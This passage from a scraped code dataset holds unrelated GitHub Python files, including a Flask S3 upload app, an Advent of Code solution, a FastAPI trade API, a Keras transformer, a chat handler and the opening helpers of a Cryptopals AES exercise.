Bootstrap\nimport boto3\nfrom config import S3_BUCKET, S3_KEY, S3_SECRET_ACCESS_KEY\nimport os\nfrom filters import *\nfrom db import Connect\ndb = Connect()\n\n\ns3 = boto3.client(\n \"s3\",\n aws_access_key_id = S3_KEY,\n aws_secret_access_key = S3_SECRET_ACCESS_KEY\n)\n\napp = Flask(\n __name__,\n static_folder = \"static\",\n static_url_path = \"/\"\n)\nBootstrap(app)\napp.config.from_object(\"config\")\napp.config[\"DEBUG\"]\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.secret_key = os.urandom(16)\n\napp.jinja_env.filters[\"datetimeformat\"] = datetimeformat\napp.jinja_env.filters[\"file_name\"] = file_name\n\n@app.route(\"/\")\ndef index():\n # get photo_name and url from AWS RDS \n # s3_resource = boto3.resource(\"s3\")\n # bucket = s3_resource.Bucket(S3_BUCKET)\n # imgs = bucket.objects.all()\n result = db.get_all_photos()\n return render_template(\"index.html\", imgs = result)\n\n@app.route(\"/upload\", methods = [\"POST\"])\ndef upload():\n # get file and file name\n file = request.files[\"file\"]\n name = request.form[\"file-name\"] + \".\" + file.filename.split(\".\")[1]\n # upload to AWS S3\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n bucket.Object(name).put(Body = file)\n # write to AWS RDS\n result = db.insert(name)\n if result == \"insert success\":\n flash(\"File uploaded successfully\")\n return redirect(url_for(\"index\"))\n if result == \"MySQL connection error\":\n flash(\"File name duplicate or other error\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/delete\", methods = [\"POST\"])\ndef delete():\n key = request.form[\"key\"]\n # AWS S3 : delete photo\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n bucket.Object(key).delete()\n # AWS RDS : delete record\n result = db.delete(key)\n if result == \"delete success\":\n flash(\"file deleted successfully\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/download\", methods = [\"POST\"])\ndef download():\n key = request.form[\"key\"]\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n file_obj = bucket.Object(key).get()\n return Response(\n file_obj[\"Body\"].read(),\n mimetype = \"text/plain\",\n headers = {\n \"Content-Disposition\": \"attachement;filename={}\".format(key.encode(\"utf-8\").decode(\"latin1\"))\n }\n )\n\nif __name__ == \"__main__\":\n app.run(port = 5000)\n","repo_name":"ttiverson3/AWS-S3-CloudFront-RDS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11269040702","text":"def read_input(inpf):\n with open(inpf) as f:\n return [(l.split()[0], int(l.split()[1])) for l in f if l.strip()]\n\n\ndirections = {\n 'R': (1, 0),\n 'U': (0, 1),\n 'L': (-1, 0),\n 'D': (0, -1)\n}\n\n\ndef move(step, pos):\n d, value = step\n dx,dy = directions[d]\n x,y = pos\n\n x,y=(x+dx*value, y+dy*value)\n \n return (x,y)\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n def distance(self, to_point):\n tx, ty = to_point.x, to_point.y\n return abs(tx-self.x) + abs(ty-self.y)\n \n def no_tension(self, to_point):\n x, y = self.x, self.y\n target = (to_point.x, to_point.y)\n no_tension = (\n (x-1, y-1), (x, y-1), (x+1, y-1),\n (x-1, y), (x,y), (x+1, y),\n (x-1, y+1), (x, y+1), (x+1, y+1),\n )\n return target in no_tension\n \n def move_towards(self, tx, ty):\n dx, dy = tx - self.x, ty - self.y\n dx, dy = dx//abs(dx) if dx else 0, dy//abs(dy) if dy else 0\n x,y = self.x + dx, self.y + dy\n if (self.x, self.y) == (x,y):\n return False\n self.x = x\n self.y = y\n return True\n \n def move_to_node(self, n):\n if self.no_tension(n):\n return False\n return self.move_towards(n.x, n.y)\n\n def __str__(self):\n return '({}, {})'.format(self.x, self.y)\n \n def __repr__(self):\n return self.__str__()\n\n\ndef print_wr(visited, path, rope):\n\n def in_rope(x,y):\n for i, p in enumerate(rope):\n if (x,y) == (p.x, p.y):\n return str(i)\n return None\n\n for y in range(-20,20): #range(ey-sy):\n for x in range(-50,50): #range(ex-sx):\n if in_rope(x, y):\n print(in_rope(x,y), end='')\n elif (x,y) == (0,0):\n print('s', end='')\n elif (x,y) in visited:\n print('#', end='')\n else:\n print('.', end='')\n print()\n\ndef solve(steps, rl=2):\n visited = {(0,0)}\n rope = [Point(0,0) for _ in range(rl)]\n\n for step in steps:\n h = rope[0]\n tx, ty = move(step, (h.x, h.y))\n while True:\n if not h.move_towards(tx, ty):\n break\n prev = h\n for i,p in enumerate(rope[1:]):\n moved = p.move_to_node(prev)\n prev = p\n visited.add((p.x, p.y)) # add the last position, since we're only moving 1 step at a time...\n print_wr(visited, [], rope)\n return len(visited)\n\n\nprint('Part 1: ', solve(read_input('input'), rl=2))\nprint()\nprint('Part 2: ', solve(read_input('input'), rl=10))","repo_name":"natemago/adventofcode-2022","sub_path":"day9-rope-bridge/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37133589620","text":"import numpy\n\nclass Graph:\n\n lista = {}\n def add_point(self, a):\n self.lista[a] = []\n\n def add_edge(self, a, b):\n self.lista[a].append(b)\n self.lista[b].append(a)\n\n def delete_point(self, a):\n for i in self.lista:\n self.lista[i].remove(a)\n self.lista.pop(a)\n\n def delete_edge(self, a, b):\n self.lista[a].remove(b)\n self.lista[b].remove(a)\n\n def neighbors_edge(self, a):\n return self.lista[a]\n\n def dfs(self, a=None):\n visited = set()\n bfsResult = []\n\n def visit(self, v):\n if v not in visited:\n visited.add(v)\n bfsResult.append(v)\n for x in self.lista_sasiedztw[v]:\n visit(self, x)\n\n if a == None:\n a = self.lista[1]\n visit(self, a)\n print(bfsResult)\n\n def bfs(self, a=None):\n visited = []\n queue = []\n\n visited.append(a)\n queue.append(a)\n\n while queue:\n s = queue.pop(0)\n\n for v in self.lista[s]:\n if v not in visited:\n visited.append(v)\n queue.append(v)\n return visited\n\nab = Graph()\nab.add_point(1)\nab.add_point(2)\nab.add_point(3)\nab.add_point(4)\nab.add_edge(4, 3)\nab.add_edge(3, 2)\nab.add_edge(2, 1)\nprint(ab.neighbors_edge(2))","repo_name":"dl7lewandowski/JiBAD-Python","sub_path":"pythonLab1/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2512991029","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nn1 = 1\nn2 = 1.14\nsdtDatang = np.arange(0, 90, 0.1)\nteta1 = []\nteta2 = []\ny0 = []\nx0 = np.arange(-5, 100, 1)\nfor i in range(len(x0)):\n y0.append(0)\n\ndef closestToNum(arr, K):\n return arr[min(range(len(arr)), key = lambda i: abs(arr[i] - K))]\n\nfor i in sdtDatang:\n teta1.append(math.radians(i))\n teta2.append(math.asin((n1/n2)*math.sin(math.radians(i))))\n\nrTE = []\ntTE = []\nrTM = []\ntTM = []\n\nfor i in range(len(teta1)):\n rTE.append(((n1*math.cos(teta1[i])) - (n2*math.cos(teta2[i]))) / ((n1*math.cos(teta1[i])) + (n2*math.cos(teta2[i]))))\n tTE.append((2*n1*math.cos(teta1[i]))/(n1*math.cos(teta1[i]) + n2*math.cos(teta2[i])))\n rTM.append((-(n1*math.cos(teta2[i])) + (n2*math.cos(teta1[i]))) / ((n1*math.cos(teta2[i])) + (n2*math.cos(teta1[i]))))\n tTM.append((2*n1*math.cos(teta1[i]))/(n1*math.cos(teta2[i]) + n2*math.cos(teta1[i])))\n\nsdtBrewsterModeTM = 0\nfor i in range(len(rTM)):\n if(rTM[i] == closestToNum(rTM, 0)):\n sdtBrewsterModeTM = sdtDatang[i]\n\nplt.plot(np.linspace(sdtBrewsterModeTM, sdtBrewsterModeTM), np.linspace(-1, 1), color='#32a68f', linestyle=':', label='Sudut Brewster pada mode TM \\n(n2=%s)'%n2 + ': %s derajat'%sdtBrewsterModeTM)\nplt.plot(np.arange(-5, 100, 1), np.linspace(0, 0, 105), '#000')\nplt.plot(sdtDatang, rTE, label='rTE')\nplt.plot(sdtDatang, tTE, label='tTE')\nplt.plot(sdtDatang, rTM, 'r', label='rTM')\nplt.plot(sdtDatang, tTM, 'g', label='tTM')\nplt.xlabel('Sudut Datang')\nplt.ylabel('t,r')\nplt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nplt.show()","repo_name":"lahiardhan/sudut-brewster","sub_path":"sudutBrewster.py","file_name":"sudutBrewster.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21608176757","text":"from itertools import combinations\nfrom collections import defaultdict\n\ndef solution(orders:list, course:list) -> list:\n answer = []\n\n for c in course:\n dic = defaultdict(int)\n for order in orders:\n temp = list(combinations(order, c))\n for comb in temp:\n combined = ''.join(sorted(comb))\n dic[combined] += 1\n \n maxFrequency = 0\n for key in dic.keys():\n maxFrequency = max(maxFrequency, dic[key])\n if maxFrequency < 2:\n continue\n \n for key in dic.keys():\n if dic[key] == maxFrequency:\n answer.append(key)\n \n answer.sort()\n return answer\n","repo_name":"alsrl8/DailyPractice","sub_path":"Problems/programmers/메뉴_리뉴얼.py","file_name":"메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2616685145","text":"import keras\nimport tensorflow as tf\n\nfrom layers.decoder import Decoder\nfrom layers.encoder import Encoder\n\n\n@keras.saving.register_keras_serializable(package=\"Transformer\")\nclass Transformer(tf.keras.Model):\n def __init__(self, *, num_layers, emb_dim, num_heads, feed_forward,\n input_vocab_size, target_vocab_size, dropout_rate=0.1):\n super().__init__()\n self.encoder = Encoder(num_layers=num_layers, emb_dim=emb_dim,\n num_heads=num_heads, feed_forward=feed_forward,\n vocab_size=input_vocab_size,\n dropout_rate=dropout_rate)\n\n self.decoder = Decoder(num_layers=num_layers, emb_dim=emb_dim,\n num_heads=num_heads, feed_forward=feed_forward,\n vocab_size=target_vocab_size,\n dropout_rate=dropout_rate)\n\n self.dense = tf.keras.layers.Dense(feed_forward)\n self.final_layer = tf.keras.layers.Dense(target_vocab_size, activation = 'softmax')\n\n def call(self, inputs):\n context, x = inputs\n context = self.encoder(context)\n x = self.decoder(x, context)\n x = self.dense(x)\n logits = self.final_layer(x) \n return logits","repo_name":"bmichas/tranformer_project","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43883870235","text":"\"\"\" imports \"\"\"\nfrom datetime import datetime\nfrom fastapi import FastAPI, Query, HTTPException\nfrom db import ConnectDB\nfrom pymongo import ASCENDING, DESCENDING\nfrom model import PaginatedTrades, Paginate, TradeList, emptyTradeList, SortOrder, TradeType\nfrom helpers import parse_cursor, get_trade_object, get_sorted\n\napp = FastAPI()\n\n\n@app.get('/')\ndef get_search_info(search: str | None = None) -> TradeList:\n \"\"\" The search method of the API \"\"\"\n if search is None:\n return emptyTradeList\n else:\n print(f'search query: {search}')\n db = ConnectDB()\n collection = db.get_collection()\n query = {\"$text\": {'$search': f'^\"{search}\"$'}}\n print(query)\n cursor = collection.find(query)\n trades = parse_cursor(cursor)\n print(len(trades))\n response = TradeList(\n content=trades,\n total=len(trades)\n )\n return response\n\n\n@app.get('/trades', response_model=PaginatedTrades)\ndef get_trades_list(\n page: int = 1, page_size: int = Query(10, description='The maximum trades displayed per page.'),\n\n sort: bool = False, order: SortOrder = SortOrder.ASC,\n\n sort_col: int = Query(\n 1, description=\"\"\"\n Sort according to any column.\n values:\n 1: asset_class\n 2: counterparty\n 3: instrument_id\n 4: instrument_name\n 5: trade_date_time\n 6: buySellIndicator\n 7: price\n 8: quantity\n 9: trader\"\"\", lt=10, gt=0\n ),\n\n asset_class: str | None = Query(\n None, description='Asset class of the trade.'),\n\n end: str | None = Query(\n None, description=\"The maximum date for the tradeDateTime field in ISO 8601 format \\\n (YYYY-MM-DD)\", regex=r'^\\d{4}-\\d{2}-\\d{2}$'),\n\n max_price: int | None = Query(\n None, description='The maximum value for the tradeDetails.price field.'),\n\n min_price: int | None = Query(\n None, description='The minimum value for the tradeDetails.price field.'),\n\n start: str | None = Query(\n None, description=\"The minimum date for the tradeDateTime field in ISO 8601 format \\\n (YYYY-MM-DD)\", regex=r'^\\d{4}-\\d{2}-\\d{2}$'),\n\n trade_type: TradeType | None = Query(\n None, description='The tradeDetails.buySellIndicator is a BUY or SELL')\n) -> HTTPException | PaginatedTrades:\n \"\"\" Getting a paginated list of trades, with advanced[acc. to any of the folders] sorting[asc/desc] and advanced filters.\"\"\"\n\n # Fetch the advanced filtering criteria:\n filters = {}\n\n if asset_class:\n filters['asset_class'] = asset_class\n\n if trade_type:\n filters['trade_details.buySellIndicator'] = trade_type\n\n if end or start:\n\n date_filter = {}\n lst = []\n\n if end:\n lst.append([end, '$lte'])\n\n if start:\n lst.append([start, '$gte'])\n\n for data in lst:\n\n try:\n print('here', type(data[0]), data[0])\n date = datetime.fromisoformat(data[0])\n date_filter[data[1]] = date\n\n except ValueError as err:\n raise HTTPException(status_code=400, detail=str(err)) from err\n\n filters['trade_date_time'] = date_filter\n\n if max_price or min_price:\n\n price_filter = {}\n\n if max_price:\n price_filter['$lte'] = max_price\n\n if min_price:\n price_filter['$gte'] = min_price\n\n filters['trade_details.price'] = price_filter\n\n print('filters provided:', filters)\n # Get the sorting order\n if sort:\n if order is SortOrder.ASC:\n sort_order = ASCENDING\n else:\n sort_order = DESCENDING\n\n # Get the data from db\n db = ConnectDB()\n collection = db.get_collection()\n cursor = collection.find(filters)\n if sort:\n cursor = cursor.sort(get_sorted(sort_col), direction=sort_order)\n trades = parse_cursor(cursor)\n # print(trades)\n total_data_len = len(trades)\n db.close()\n\n # Get the page\n first = (page - 1) * page_size\n last = first + page_size\n\n if last >= total_data_len:\n nxt = None\n\n if page > 1:\n prev = f'/trades?page={page-1}&page_size={page_size}'\n else:\n prev = None\n\n else:\n if page > 1:\n prev = f'/trades?page={page-1}&page_size={page_size}'\n else:\n prev = None\n\n nxt = f'/trades?page={page+1}&page_size={page_size}'\n\n return PaginatedTrades(\n content=trades[first:last],\n total=len(trades),\n count=min(page_size, len(trades[first:])), # On the final page,\n # the count of total results should be exact\n page=page,\n paginate=Paginate(\n previous=prev,\n next=nxt\n )\n )\n\n\n@app.get('/trades/{trade_id}', response_model=TradeList)\ndef get_trade_by_trade_id(trade_id: str):\n \"\"\" getting a trade by its trade_id \"\"\"\n try:\n print('trade_id:', trade_id)\n db = ConnectDB()\n collection = db.get_collection()\n trade = collection.find_one({'trade_id': trade_id})\n # print(trade)\n if trade is None:\n return emptyTradeList\n\n trade = get_trade_object(trade)\n print(trade)\n return TradeList(\n content=trade,\n total=1\n )\n except Exception as exc:\n print(exc)\n finally:\n db.close()\n","repo_name":"WindBlaze1/FastAPI-Assessment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37137839820","text":"def fibo(n):\r\n result = []\r\n a,b = 0,1\r\n while a < n:\r\n result.append(a)\r\n a,b = b, a+b\r\n return result\r\n\r\ndata = int(input(\"Enter the upper range:\"))\r\n\r\nprint(fibo(data))\r\n","repo_name":"wadekar43/Basic_Programming","sub_path":"Simple Programs/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21958713267","text":"import os\n\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(\"version.txt\")) as version_file:\n version_from_file = version_file.read().strip()\n\nwith open(\"requirements.txt\") as f_required:\n required = f_required.read().splitlines()\n\nwith open(\"test_requirements.txt\") as f_tests:\n required_for_tests = f_tests.read().splitlines()\n\nsetup(\n name=\"cloudshell-cli\",\n url=\"https://www.quali.com/\",\n author=\"QualiSystems\",\n author_email=\"info@qualisystems.com\",\n packages=find_packages(),\n install_requires=required,\n tests_require=required_for_tests,\n python_requires=\"~=3.7\",\n version=version_from_file,\n package_data={\"\": [\"*.txt\"]},\n description=\"QualiSystems CloudShell CLI support package\",\n long_description=\"QualiSystems CloudShell CLI support package\",\n include_package_data=True,\n)\n","repo_name":"QualiSystems/cloudshell-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"17482531827","text":"import sys\nimport pygame\ndef check_events(ship):\n \"\"\"响应按键和鼠标事件\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n #退出游戏\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ship)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\ndef check_keydown_events(event, ship):\n \"\"\"相应按键\"\"\"\n if event.key == pygame.K_RIGHT:\n # 向右移动飞船\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n # 向左移动飞船\n ship.moving_left = True\n\ndef check_keyup_events(event, ship):\n \"\"\"松开按键\"\"\"\n if event.key == pygame.K_RIGHT:\n # 停止移动飞船\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n # 停止移动飞船\n ship.moving_left = False\n\ndef update_screen(ai_settings, screen, ship):\n \"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n #每次循环时重绘屏幕\n screen.fill(ai_settings.bg_color)\n ship.blitem()\n #让最近绘制的屏幕可见\n pygame.display.flip()","repo_name":"zhangbin0git/alien_invasion","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40893079819","text":"from google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom django.utils import simplejson\n\nimport config\nimport models\nimport common\nfrom RequestHandler import RequestHandler\n\nimport os\nimport time\n\nclass GetUpdate(RequestHandler):\n def get_update(self):\n update_id = self.request.get('update_id', None)\n if update_id is not None:\n update_id = int(update_id)\n\n chat_update_id = self.request.get('chat_update_id', None)\n if chat_update_id is not None:\n chat_update_id = int(chat_update_id)\n\n userchat_key = db.Key(self.request.get(\"userchat_key\", None))\n\n chat_id = userchat_key.id_or_name()\n if chat_id:\n peer_id_holder = self.memcache_fetcher.get(config.MEMCACHE_PEER_ID(userchat_key.parent().id_or_name(), chat_id))\n self.login(prev_update_id = update_id, chat_id = chat_id, prev_chat_update_id = chat_update_id)\n\n message = None\n if chat_id:\n if userchat_key.parent() != self.user_key:\n self.response.set_status(404)\n return\n chat_key = db.Key.from_path('Chat', chat_id)\n chat_timestamp = common.str2datetime(self.request.get('chat_timestamp'))\n\n message = self.request.get(\"message\", None)\n\n peer_id = peer_id_holder.get_result()\n if peer_id is None:\n userchat = self.datastore_fetcher.get(userchat_key)\n peer_userchat_key = common.get_ref_key(userchat.get_result(), 'peer_userchat')\n peer_id = peer_userchat_key.parent().id_or_name()\n memcache.set(peer_id_holder.get_key(), peer_id, time = 600)\n\n peer_status = self.memcache_fetcher.get(config.MEMCACHE_LAST_BEEN_ONLINE(peer_id))\n message_entity = None\n if message:\n message = common.htmlize_string(common.sanitize_string(message))\n message_entity = models.Message(parent = chat_key, message_string = message, sender = userchat_key)\n\n peer_chat_open = self.memcache_fetcher.get(config.MEMCACHE_USER_OPEN_CHAT(peer_id, chat_id))\n if peer_chat_open.get_result() is None:\n peer_unreadchat_key = db.Key.from_path('User', peer_id, 'UnreadChat', chat_id)\n peer_unreadchat = models.UnreadChat(key = peer_unreadchat_key)\n\n userchat_holder = self.datastore_fetcher.get(userchat_key)\n peer_userchat_holder = self.datastore_fetcher.get(db.Key.from_path('User', peer_id, 'UserChat', chat_id))\n userchat = userchat_holder.get_result()\n peer_userchat = peer_userchat_holder.get_result()\n userchat.last_updated = self.now\n peer_userchat.last_updated = self.now\n db.put([message_entity, peer_unreadchat, peer_userchat, userchat])\n\n peer_update_id = memcache.incr(config.MEMCACHE_USER_UPDATE_ID(peer_id), initial_value = 0)\n memcache.set(\n config.MEMCACHE_USER_NOTIFICATION(peer_id, peer_update_id),\n {\n 'username' : models.User.get_username(self.user_key),\n 'chat_id' : chat_id,\n 'message' : message,\n 'link' : '/chat/%s' % models.User.get_username(self.user_key),\n 'timestamp' : message_entity.date_time,\n },\n time = config.NOTIFICATION_DURATION,\n )\n else:\n db.put(message_entity)\n\n if self.chat_update_id:\n new_messages = db.Query(models.Message).ancestor(chat_key).filter('date_time >', chat_timestamp).order('-date_time').fetch(10)\n try:\n self.client_update['chat_timestamp'] = str(new_messages[0].date_time)\n except:\n pass\n new_messages.reverse()\n\n template_values = {\n \"username\" : models.User.get_username(self.user_key),\n \"messages\" : [{'message_string': msg.message_string, 'username': models.User.get_username(common.get_ref_key(msg, 'sender').parent())} for msg in new_messages],\n }\n path = os.path.join(os.path.dirname(__file__), '_messages.html')\n self.client_update['messages_html'] = template.render(path, template_values).decode('utf-8')\n elif message_entity is not None:\n self.client_update['chat_timestamp'] = str(message_entity.date_time)\n template_values = {\n \"username\" : models.User.get_username(self.user_key),\n \"messages\" : [{'message_string': message_entity.message_string, 'username': models.User.get_username(common.get_ref_key(message_entity, 'sender').parent())}],\n }\n path = os.path.join(os.path.dirname(__file__), '_messages.html')\n self.client_update['messages_html'] = template.render(path, template_values).decode('utf-8')\n\n if chat_id and message_entity:\n self.chat_update_id = memcache.incr(config.MEMCACHE_CHAT_UPDATE_ID(chat_id), delta = 1, initial_value = 0)\n\n self.client_update['status_class'] = \"offline\" if peer_status.get_result() is None else \"online\"\n\n self._get_client_update()\n return self.client_update\n\n def get(self):\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(simplejson.dumps(self.get_update()))\n def post(self):\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(simplejson.dumps(self.get_update()))\n\nclass UpdateContext(RequestHandler):\n def post(self):\n from utils import set_user_context\n context = common.sanitize_string(self.request.get(\"context\").strip()) \n user_key = self.get_current_user_key()\n set_user_context(user_key, context)\n self.response.out.write(context)\n\n","repo_name":"zaidka/peerpalette","sub_path":"peerpalette.com/Ajax.py","file_name":"Ajax.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21485692900","text":"#Jordan Fonseca\n\n#3.1\n\nDNA = input(str(\"Enter the first DNA sequence\")) #Asks user to input 2 DNA strings\nDNA2 = input(str(\"Enter the second DNA sequence\"))\n\nNumMatches = sum(a==b for a, b in zip(DNA, DNA2))\n#sum of the number of times DNA and DNA2 match\n\nprint(NumMatches) #prints the number of matches\n\n#I was not able to figure out 3.2 or 3.4\n","repo_name":"jfonseca4/FonsecaCSC201-program03","sub_path":"program03-Part2.py","file_name":"program03-Part2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30540612276","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport subprocess \n\ndef outlier_remove(data):\n\tmin_quan= data['Actual'].quantile(0.25)\n\tmax_quan= data['Actual'].quantile(0.75)\n\tIQR = max_quan - min_quan\n\t# print(min_quan, max_quan, IQR)\n\tmax_quan = max_quan + (1.5 * IQR)\n\t# print(min_quan, max_quan)\n\tdata = data[data['Actual'] > min_quan]\n\tdata = data[data['Actual'] < max_quan]\n\treturn data \n\n# subprocess.call('/usr/bin/python3 ~/workspace/tableau/python_scripts/mongo_to_csv.py', shell = True)\n\n \ndataset = pd.read_csv('/home/u73/workspace/tableau/python_scripts/new_data_transformed_metrics.csv', low_memory = False)\n# dataset = outlier_remove(dataset)\n# dataset.to_csv('eg.csv', index = False)\n\n\n# print('range of actuals {} to {}'.format(min(dataset['Actual']),max(dataset['Actual'])))\n\ndataset['Date'] = dataset['Date'].apply(lambda x: str(x).split(' ')[0])\ndataset = dataset[['Date','Session','Item','Actual','Predicted']]\ndataset = dataset.query('Item == \"ANDHRA VEG MEALS\" and Session == \"Morning\" and Date >= \"2019-04-01\"')\ndataset = dataset.groupby(['Date']).agg({'Actual':'sum', 'Predicted':'sum'})\n# dataset.to_csv('eg.csv', index = False)\n\nplt.plot(dataset['Actual'], color = 'red', label = 'actuals')\nplt.plot(dataset['Predicted'], color = 'blue', label = 'predicted')\ndates = dataset.iloc[:,1]\nplt.xticks(rotation = 90)\nplt.xlabel('dates')\nplt.ylabel('QTY')\nplt.legend(loc ='upper right')\nplt.show()\n","repo_name":"Marvel-Jacob/Exercises","sub_path":"SGD_linear_model.py","file_name":"SGD_linear_model.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27456129154","text":"#!/usr/bin/env python3\n\nimport json\nimport subprocess\nimport sys\nimport os\nimport shutil\n\nif len(sys.argv) != 2:\n print(\"Usage: assessor.py <settings file path>\")\n sys.exit(1)\n\n# Read and print settings\nprint(\"Settings\")\nwith open(sys.argv[1], \"r\") as f:\n settings = json.load(f)\nprint(\"\\n\".join([f\"- {k}: {v}\" for k, v in settings.items()]))\nprint()\n\n# Read seeds\nseeds = []\nwith open(settings[\"seedsPath\"], \"r\") as f:\n for string_seed in f:\n string_seed = string_seed.rstrip(\"\\n\")\n try:\n seed = int(string_seed)\n seeds += [seed]\n except ValueError:\n print(f\"Discarding invalid seed: '{string_seed}'\")\n\n# Determine results\nresults = []\nwins = 0\nwin_rounds = 0\nlosses = 0\nloss_rounds = 0\nif not os.path.exists(settings[\"gamesPath\"]):\n os.mkdir(settings[\"gamesPath\"])\nfor seed in seeds:\n try:\n print(f\"{seed: <25}\", end=\"\", flush=True)\n try:\n output_path = f'{settings[\"gamesPath\"]}/{seed}.json'\n if os.path.exists(output_path):\n print(\"skipped\")\n continue\n process = subprocess.run(\n [\n settings[\"binaryPath\"], \"-s\",\n str(seed), \"-u\", settings[\"endpointURL\"], \"-t\",\n str(settings[\"timeout\"]), \"-o\", output_path\n ]\n )\n lines = tuple(open(output_path, \"r\"))\n except Exception as exception:\n print(\"failed\")\n os.remove(output_path)\n print(f\"Failed to run command line tool: {exception}\")\n break\n state = json.loads(lines[-1])\n rounds = state[\"round\"]\n outcome = state[\"outcome\"]\n result = {\"rounds\": rounds, \"outcome\": outcome, \"seed\": seed}\n results += [result]\n if outcome == \"win\":\n wins += 1\n win_rounds += rounds\n if outcome == \"loss\":\n losses += 1\n loss_rounds += rounds\n print(f'{outcome} ({rounds})')\n except KeyboardInterrupt:\n print(\"interrupted\")\n os.remove(output_path)\n break\nprint(f\"{wins} ({win_rounds}) - {losses} ({loss_rounds})\")\n\n# Store results\nwith open(settings[\"resultsPath\"], \"w\") as f:\n json.dump(results, f)\n","repo_name":"informatiCup/informatiCup2020","sub_path":"src/tools/assessor/assessor.py","file_name":"assessor.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"35465257065","text":"#\n# Prompt the user to input two numbers, check if the denominator (the bottom number)\n# is 0. If it is then print \"You can't divide by zero!\", otherwise print the quotient.\n#-----------------------------------------------------------------------------------------------------\n\n\n\nnum1 = input(\"Give me a number \")\nnum2 = input(\"Give me another number\")\n\nnum1 = int(num1)\nnum2 = int(num2)\n\nif num2 == 0:\n print(\"You can't divide by zero!\")\nelse:\n print(num1 / num2)\n\n\n\n\n\n","repo_name":"SeaStarr7/PythonClass","sub_path":"Week1/pyPrep_week01_drill_06.py","file_name":"pyPrep_week01_drill_06.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32477724230","text":"import sys\n\nprvniCislo = int(sys.argv[1])\ndruheCislo = int(sys.argv[2])\n\nif druheCislo == 0:\n print('Nulou se delit nelze')\nelse:\n podilCisel=prvniCislo / druheCislo \n print(f\"Podil cisel {prvniCislo} a {druheCislo} je {round(podilCisel,3)}\")","repo_name":"Nadaercz/Nadazkouska2010","sub_path":"deleni.py","file_name":"deleni.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28523136402","text":"# Cryptopals\n# Set 2 Challenge 13\n\nfrom Crypto.Cipher import AES\nfrom random import randint\n\n# Decrypt with AES in ECB\ndef AES_ECB_decrypt(bytes_code, key):\n aes_cipher = AES.new(key, AES.MODE_ECB)\n return aes_cipher.decrypt(bytes_code)\n\n# Encrypt with AES in ECB\ndef AES_ECB_encrypt(bytes_code, key):\n aes_cipher = AES.new(key, AES.MODE_ECB)\n return aes_cipher.encrypt(bytes_code)\n\ndef pad_PKCS_7(message, blocksize):\n padding_amount = blocksize - len(message) % blocksize\n if padding_amount == 0:\n padding_amount = blocksize\n padding = bytes([padding_amount]) * padding_amount\n return message + padding\n\ndef unpad_PKCS_7(message, blocksize):\n padding_amount = message[-1]\n return message[:-padding_amount]\n\ndef random_bytes(n):\n 